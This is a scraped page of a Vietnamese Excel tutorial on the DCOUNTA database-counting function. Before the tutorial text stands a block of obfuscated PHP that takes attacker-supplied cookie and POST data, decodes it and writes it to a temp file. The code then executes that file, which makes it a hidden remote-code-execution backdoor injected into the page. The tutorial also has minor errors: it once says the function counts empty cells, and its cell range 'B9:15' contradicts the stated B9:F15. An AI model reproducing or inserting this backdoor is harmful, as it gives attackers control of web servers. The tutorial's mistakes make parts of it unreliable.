$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm DCOUNTA trong Excel – Đếm ô không trống trong cơ sở dữ liệu - Tải Chùa

Hàm DCOUNTA trong Excel – Đếm ô không trống trong cơ sở dữ liệu

Rate this post
Bài viết chia sẻ hôm nay chúng tôi sẽ giới thiệu đến bạn cách sử dụng hàm DCOUNTA trong Excel đếm ô không trống trong cơ sở dữ liệu theo điều kiện cho trước.

Nếu như ở bài viết chia sẻ lần trước chúng ta đã tìm hiểu chi tiết và cách dùng hàm DCOUNT để đếm ô trong Excel với điều kiện cho trước, thì bài viết này chúng tôi sẽ giới thiệu đến bạn hàm DCOUNTA cùng nhóm hàm cơ sở dữ liệu.

Hàm DCOUNTA

Hàm DCOUNTA

Hàm DCOUNTA trong Excel là hàm đếm ô trống trong những trường ở cơ sở dữ liệu hay danh sách bản ghi theo điều kiện xác định cụ thể. Chính vì vậy mà hàm này được sử dụng và giúp người dùng thuận tiện hơn trong việc làm báo cáo, tính toán công việc cũng như học tập. Cùng tìm hiểu ngay cách sử dụng hàm DCOUNTA trong Excel dưới đây ngay nhé.

Hướng dẫn dùng hàm DCOUNTA trong Excel

Cú pháp:

=DCOUNTA(database, field, criteria)

Ý nghĩa:

  • Database: phạm vi các ô, danh sách hay cơ sở dữ liệu. Đây là đối số bắt buộc.
  • Field: tiêu đề của cột nếu nhập trực tiếp hoặc để trong dấu kép vị trí ô tham chiếu. Dùng để chỉ rõ cột sẽ sử dụng trong hàm DCOUNTA và cũng là đối số bắt buộc.
  • Criteria: ô chứa điều kiện cần xét của hàm. Bạn có thể dùng bất kỳ một phạm vi nào nhưng phải chứa một ô tiêu đề và ô điều kiện.

Lưu ý:

  • Hàng đầu tiên của danh sách các ô, cơ sở dữ liệu phải chứa tiêu đề cho mỗi cột cần đếm.
  • Có thể sử dụng bất kỳ phạm vi nào dành cho đối số điều kiện Criteria sao cho chứa một tiêu đề và một điều kiện ở cột khác nhau.
  • Không nên đặt phạm vi điều kiện xét bên dưới danh sách cơ sở dữ liệu. Bởi vì thông tin mới khi được thêm vào danh sẽ không thêm được mà phải thêm vào cuối danh sách.
  • Phạm vi điều kiện xét không được ghi đè danh sách.
  • Muốn thao tác toàn bộ cột trong danh sách thì bạn phải nhập một dòng trống ở bên trên tiêu đều trong phạm vi điều kiện xét.

Ví dụ:

Cho đơn nhập hàng điện thoại như bảng bên dưới. Bạn hãy tính số điện thoại đang được giảm giá?

Hàm DCOUNTA trong Excel

Ví dụ hàm DCOUNTA

Áp dụng công thức của hàm DCOUNTA trong Excel ta có =DCOUNTA(B9:15;F9;D5:D6)

Cách sử dụng hàm DCOUNTA

Công thức hàm DCOUNTA

Trong đó:

  • B9:F15 là phạm vi cơ sở dữ liệu
  • F9 là ô chứa tiêu đề D5:
  • D6 là điều kiện xét.

Nhấn Enter và đây là kết quả khi hoàn thành:

Hướng dẫn dùng hàm DCOUNTA

Kết quả hàm DCOUNTA

Như vậy cách sử dụng hàm DCOUNTA cũng rất dễ dàng phải không? Bạn có thể tham khảo thêm hàm DCOUNT để biết cách đếm ô trong Excel với điều kiện cho trước. Cùng tìm hiểu nhiều thêm những thủ thuật để sử dụng Excel thành thạo nhé.